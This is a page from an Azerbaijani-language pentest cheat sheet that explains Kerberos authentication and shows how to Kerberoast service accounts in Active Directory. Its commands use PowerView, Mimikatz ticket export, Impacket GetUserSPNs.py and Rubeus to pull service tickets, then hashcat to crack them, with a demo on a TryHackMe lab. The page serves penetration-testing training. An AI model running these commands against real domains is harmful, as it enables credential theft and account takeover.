Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page
  • Kerberoasting
  • PowerView
  • AD Modulu
  • Impacket
  • Rubeus
  • Praktiki nümayiş

Was this helpful?

  1. AD Pentesting
  2. Domain Privilege Escalation

Kerberoast

PreviousDomain Privilege EscalationNextASREPRoast

Last updated 1 year ago

Was this helpful?

Kerberos biletlərlə fəaliyyət göstərən autentifikasiya protokoludur. Bu protokol, birbaşa parolları paylaşmaq əvəzinə, istifadəcinin kim olduğunu sübut etməsi üçün "ticket"dən (bilet) istifadə edir. Kerberos həm istifadəçinin, həm də serverin autentifikasiya edildiyi bir protokoldur, buna görə də təhlükəsizlik üçün yaxşı bir seçimdir.

Kerberos autentifikasiya prosesi aşağıdakı kimidir:

İstifadəçi İstəyi: İstifadəçi Ticket Granting Ticket (TGT) tələb edir.

Doğrulama və TGT Verilməsi(AS-REP): Key Distribution Center(KDC) istifadəçinin məlumatların (credentials) yoxlayır və şifrələnmiş TGT verir.

Xidmətə Giriş İstəyi(TGS-REQ): İstifadəçi şifrələnmiş TGT'i və giriş etmək istədiyi xidmətin SPN(Service Principal Name) Ticket Granting Server'ə (TGS) göndərir.

TGS Cavabı (TGS-REP): Key Distribution Center (KDC) istifadəçinin TGT'i yoxlayır, hər şey doğudursa, istifadəçinin giriş etmək istədiyi xidmət üçün bir sessiya açarı göndərir.

Xidmət Autentifikasiya İstəyi (AP-REQ): İstifadəçi xidmətə giriş etmək üçün sessiya açarını göndərir.

Giriş Verilir (AP-REP): Xidmət girişi təsdiqləyir.

Kerberoasting

Kerberoasting, istifadəçiyə hər hansı xidmət üçün bilet tələb etməyə imkan verir, daha sonra həmin bilet xidmətin parolunu sındırmaq üçün istifadə olunur. Xidmətin SPN'i varsa, o, Kerberoast hücumuna həssas ola bilər, lakin hücumun uğuru parolun nə qədər güclü olmasından və sındırılmış xidmət hesabının səlahiyyətlərindən asılıdır. Kerberoast hücumu ediləcək hesabları listələmək üçün BloodHound alətindən istifadə edilə bilər. "Domain Enumeration" hissəsində qeyd edilən bu alət, domen istifadəçiləri, kerberoast edə biləcəyimiz hesabların domenin qalan hissəsi ilə hansı əlaqələrinin olduğu kimi məlumatları əldə etməyə imkan verir.

PowerView

# Xidmət Hesabları kimi istifadə edilən İstifadəçi Hesablarını əldə edilməsi
Get-NetUser -SPN

Bu əmr xidmət hesabları kimi konfiqurasiya edilmiş və Service Principal Name (SPN) ilə əlaqələndirilmiş istifadəçi hesablarını əldə etmək üçün istifadə olunur.

# Mövcud olan hər bir SPN hesabını əldə edilməsi, TGS istəyi və onun hash dump'ı
Invoke-Kerberoast

Bu əmr Kerberoasting metodundan istifadə edir. O, domendəki mövcud SPN hesablarını çəkir, hər bir hesab üçün Ticket Granting Service (TGS) bileti tələb edir və sonra hash'i çıxarmaq üçün TGT'i sındırmağa ( və ya "roast"a) cəhd edir. Bu, xidmət hesablarının məlumatlarını(credentials) əldə etmək üçün ümumi hücum üsullarından biridir.

# Bir hesab üçün TGS sorğusu
Request-SPNTicket

Bu əmr müəyyən bir hesab üçün TGS'i sorğulayır. Bu, təcavüzkarın müəyyən bir xidmət hesabını hədəf almasına və sonradan potensial hücumlar üçün təhlil edilə biləcək TGS biletini əldə etməyə imkan verir.

# Mimikatz istifadə edərək bütün biletlərin əldə edilməsi
Invoke-Mimikatz -Command '"kerberos::list /export"'

Bu əmr Kerberos funksionallığı üçün Mimikatz alətindən istifadə edir. Bu əmr ilə Kerberos biletləri əldə edilə bilər.

AD Modulu

Aşağıdakı əmr, boş olmayan ServicePrincipalName xassəsinə malik istifadəçi hesablarının siyahısını qaytaracaq ki, bu da onların xidmət hesabları kimi istifadə olunduğunu göstərir:

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Get-ADUser: Bu cmdlet PowerShell-də Active Directory modulunun bir hissəsidir və istifadəçi hesablarını əldə etmək üçün istifadə olunur.

-Filter {ServicePrincipalName -ne "$null"}: Əmrin bu hissəsi filtr şərtini təyin edir. O, ServicePrincipalName xassəsinin $null-a bərabər olmadığı istifadəçi hesablarını alır, yəni boş deyil.

-Properties ServicePrincipalName: Əmrin bu hissəsi təyin edir ki, ServicePrincipalName xassəsi çıxışa daxil edilməlidir. Bu, istifadəçi hesabları ilə əlaqəli xidmətin adları haqqında məlumat əldə etmək üçün istifadə olunur.

Impacket

'cd' əmri ilə impacket qovluğuna keçin:

cd Impacket-0.9.19

Daha sonra aşağıdakı əmrdən istifadə edərək impacket'i quraşdırın:

pip install .

Cari qovluğu GetUserSPNs.py skriptinin yerləşdiyi yerə dəyişdirin. Bu skript Impacket nümunələrinin bir hissəsidir və Kerberos biletlərini çıxarmaq üçün istifadə olunur. Bunun üçün aşağıdakı əmri icra edin:

python GetUserSPNs.py <DomainName>/<DomainUser>:<Password> -outputfile <FileName>

Bu əmr qeyd edilən istifadəçi adı və paroldan istifadə edərək verilmiş domendə Kerberoasting hücumu həyata keçirir. Bunun üçün GetUserSPNs.py skriptindən istifadə edir və hücumun nəticəsi qeyd edilən faylda saxlanılır.

Rubeus

Rubeus Kerberos ilə qarşılıqlı əlaqə və sui-istifadə üçün istifadə olunan C# alətlər dəstidir. O, Kerberos biletləri ilə qarşılıqlı əlaqədə olmaq və autentifikasiya axınını anlamaq üçün xüsusi olaraq hazırlanmış vasitədir.

#Kerberoasting və çıxışı xüsusi formatla bir faylda saxlamaq
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName>

#/rc4opsec Rubeus parametri Kerberoasting hücumunu optimallaşdırmaq üçün istifadə olunur. 
#Bu parametr istifadəçi hesablarını RC4 şifrələməsi ilə sorğulamağa imkan verir. 
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /rc4opsec

#AES aktivləşdirilmiş hesablar üçün Kerberoast hücumu
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /aes

#Qeyd edilən istifadəçi hesabına Kerberoast hücumu
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /user:<username> /simple

#Autentifikasiya etimadnamələrini göstərərək Kerberoast hücumu
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /creduser:<username> /credpassword:<password>

Praktiki nümayiş

'Rubeus.exe kerberoast' əmri ilə istifadəçilərin kerberos krb5tgs hashını əldə edirəm.

Hash dəyərini hash.txt faylına yazıram:

İndi isə aşağıdakı hashcat əmri ilə parolu əldə etməyə çalışıram:

hashcat -m 13100 -a 0 hash.txt Pass.txt

Və plaintext parolu əldə edirəm!

PowerView, Windows Active Directory (AD) mühiti haqqında məlumat toplamaq üçün penetration testing'də geniş istifadə olunan PowerShell alətidir. Yükləmək üçün istifadə edə bilərsiniz.

Impacket 0.9.19'u yükləmək üçün istifadə edin.

Yükləmək üçün istifadə edə bilərsiniz.

Praktikada istifadə edəcəyim TryHackMe lab'ı üçün istifadə edə bilərsiniz.

bu keçiddən
bu keçiddən
bu keçiddən
bu keçiddən